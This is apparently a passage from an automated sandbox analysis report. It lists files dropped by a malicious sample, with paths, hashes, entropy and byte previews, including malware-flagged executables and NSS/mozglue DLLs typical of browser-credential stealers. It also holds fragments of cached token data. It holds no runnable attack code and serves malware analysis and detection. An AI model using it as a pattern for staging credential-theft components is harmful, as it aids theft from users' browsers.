                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):50
                                                                                        Entropy (8bit):3.9904355005135823
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                        MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                        SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                        SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                        SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:topTraffic_170540185939602997400506234197983529371

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):575056
                                                                                        Entropy (8bit):7.999649474060713
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):86
                                                                                        Entropy (8bit):4.3751917412896075
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                        MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                        SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                        SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                        SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a7d33e5a-b702-495b-8abb-6fcf6fe8596e.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):44890
                                                                                        Entropy (8bit):6.095098293161141
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW50i1zNt049FMNYskSPnEKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynX0FM4KtSmd6qE7lFoC
                                                                                        MD5:277606DC480026F1670FDBC47E6B89F8
                                                                                        SHA1:DFAF5F1F0A3A3AB645E553597E9B55505A468B97
                                                                                        SHA-256:7490C4B39ECA08748D4BE3A38862C21F1B9DF65A40F6DFA97A6E1445F8A35EED
                                                                                        SHA-512:4F0C0DB3057D1D1AC2E92C7018B4A625DDEEAC39930D8238BC1654535588CE84C9E4D0638F04A6A509EFBADD1C9D1C95A8D0455B8319A1C580FD528477DF105A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b1de55c4-39a8-4048-b1f4-6f6cb9619c53.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44945
                                                                                        Entropy (8bit):6.09477997948769
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWz0i1zNt049FM97sDPw5nKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yOD0FMfKtSmd6qE7lFoC
                                                                                        MD5:A96928CB13354A2206C7C3B86C0BC718
                                                                                        SHA1:1D1CB4C080363145D7CDBEDC1F6426A5C8208600
                                                                                        SHA-256:549728713EEFFB1962EE0B2C824ACFA42B7B2B49D53B49418BFFBB147B0C5BEE
                                                                                        SHA-512:B1F8B5662DCD77D1E9E2F29384AC44F340E13B10126B57864465C7F1EB2F397E09724A056D7573B7D5C00FA6022BFA0C7F4CCEF1807C97DB33197CD3AE74B81B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ca773db8-dcd1-4cf8-aa59-02dcd3b1f71d.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\efdd79c2-a4b4-4e24-9338-2e836deb27b2.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):48063
                                                                                        Entropy (8bit):6.089712987840139
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:SM7X2zt1jOXtXi3zahcK3IPi1zNt049FM97sDPw5nNZHQC05CiobJDSgzMMd6qDZ:SMSzMtXija+K40FMfNBWFobtSmd6qE7q
                                                                                        MD5:6F875D4FC83F3F17FEAA652AECB4B8DE
                                                                                        SHA1:547AF6A91FE06D5573B2E49875476DBC0735684C
                                                                                        SHA-256:80E8EC9015FE584AEDE52F502081B6C21B5AF6DB5004BBD8E5D865711FD9DE94
                                                                                        SHA-512:5AABD5D0D676D86B252BAC08797573AFBDFCDF1446D80345DE75097FA032CC386CA13224D91D6512B922F0B2B28BB95C7C4B97AB923CD8E4FE6086D2DCE947D0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13366271670208478","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1721798074"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):2278
                                                                                        Entropy (8bit):3.852211358949444
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:uiTrlKxrgxRxl9Il8uJWW2jZ045BP3qUg9Wvghd1rc:m0Yv3K02JaTy
                                                                                        MD5:D7CDBCB6CE03C053793F5420ED444C1A
                                                                                        SHA1:E7A9B8E75804A7D7EA2C3373E1993D4E864C5403
                                                                                        SHA-256:AFE0BAE51CE701EBD0D07E297FCBD7B3073A2BC250F6D0C176AE81A318FD7AFD
                                                                                        SHA-512:6E650B83DB27FF2ACCC4C9E8CBBB773BB558A1EBFF1C3FFEFAD9D4831CB359AC4B9E1157AD32E070588246FA42A217CA805A04916A9BCA877D6E3AF3B53C588A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.I.S.O.w.p.D.d.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.z.z.J.Y.F.p.

                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4622
                                                                                        Entropy (8bit):4.000310149943064
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:yYviU3wEzaQPFdcGIbLNlYWJ5WmojPlrpSJ4xGhA:y5UPfPUTP/YWJ5Wmspb
                                                                                        MD5:673260BF89298E7A1721D068C5C4F702
                                                                                        SHA1:E0D40151B7C2570ACB1C11259D6FCCF422DAC754
                                                                                        SHA-256:325C457D10C798364D47619320AE1A1417637ABEC1F1677364DB7793B9804DE8
                                                                                        SHA-512:7791F6ABF6091687B9B42C78A33C9E666C9C606A79D3CEC6BA37CD22800BE83AF075F4FC76314AFD6395B5A0CF6D2E179E4E217D4B2BF1D35F716411C5C1FFB6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.Q.L.A.p.o.j.d.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.z.z.J.Y.F.p.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\amadka[1].exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1893888
                                                                                        Entropy (8bit):7.949794819876416
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:1di9oXLlhWykLaYpnirDNlaXhVlq0WxxdhBvFrupS:C9oXph7yhnkaR60WxBdcp
                                                                                        MD5:A0CED1B039766FBE1B0C2DA4F5BBAA5E
                                                                                        SHA1:FC8CD54E79FB23E550E29F6CF0DC0400D8550E15
                                                                                        SHA-256:9E582118BDC2B1BA04A4B393E8A0FC0E2E7156A615E0C411AEA24DE743C7996E
                                                                                        SHA-512:AC2F515E43DE5A5F659C26B1A4ED8F8E7B4090D3CDB9EA9195DDF8E8DA77F6D349DEADD87D6A4A049F0FD3FC4A2D63562D35FA788EE1C0CF09A5A34C936FEB74
                                                                                        Malicious:true
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................K...........@..........................0K...........@.................................X...l.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .p*.........................@...tvrujsnp..... 1.....................@...vpziaunm......J.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):685392
                                                                                        Entropy (8bit):6.872871740790978
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\go[1].exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):91648
                                                                                        Entropy (8bit):6.753556592039648
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfDxGLLPmoOq:Hq6+ouCpk2mpcWJ0r+QNTBfDMHmO
                                                                                        MD5:D72007A9646255AC092CF654388CFEB8
                                                                                        SHA1:5899014B81E4BC7BE63DB2170036397110A2FDEC
                                                                                        SHA-256:C8530BB2E1F9BBE484875A2DB1F78552A1FB38EDB911ED6E93E86C48CE34D919
                                                                                        SHA-512:252C6DA72E7B5CB71C12002810EBB09C90AC0657081C71E8E7A0DB28F992177A8A4C589700F3AED4712759559AA843DADFA0D94E1D499DD65D0F4D5D01AB347E
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\go[1].exe, Author: Joe Security
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....V...............0....@.........................................................................|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):608080
                                                                                        Entropy (8bit):6.833616094889818
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):450024
                                                                                        Entropy (8bit):6.673992339875127
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2046288
                                                                                        Entropy (8bit):6.787733948558952
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
